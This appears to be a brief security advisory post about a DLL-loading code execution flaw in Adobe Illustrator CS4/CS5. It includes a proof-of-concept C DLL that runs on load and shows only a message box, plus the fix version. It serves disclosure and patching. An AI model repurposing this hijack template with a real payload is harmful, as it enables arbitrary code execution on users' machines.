December 5, 2016

Adobe Illustrator ‘aires.dll’ DLL Loading Arbitrary Code Execution Vulnerability

Adobe Illustrator CS5 15.0.1, CS5 and CS4 are prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can use this vulnerability by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Exploit:

#include <windows.h>

BOOL WINAPI DllMain (

HANDLE hinstDLL,

DWORD fdwReason,

LPVOID lpvReserved)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

dll_hijack();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

int dll_hijack()

{

MessageBox(0, “Adobe DLL Hijacking!”, “DLL Message”, MB_OK);

}

Please upgrade your Adobe Illustrator to Adobe Illustrator CS5 15.0.2. to fix this security issue. This vulnerability has been discovered by Glafkos Charalambous.

Source:[SecurityFocus.com]

Share and Enjoy:
  • Print
  • Digg
  • StumbleUpon
  • del.icio.us
  • Facebook
  • Yahoo! Buzz
  • Twitter
  • Google Bookmarks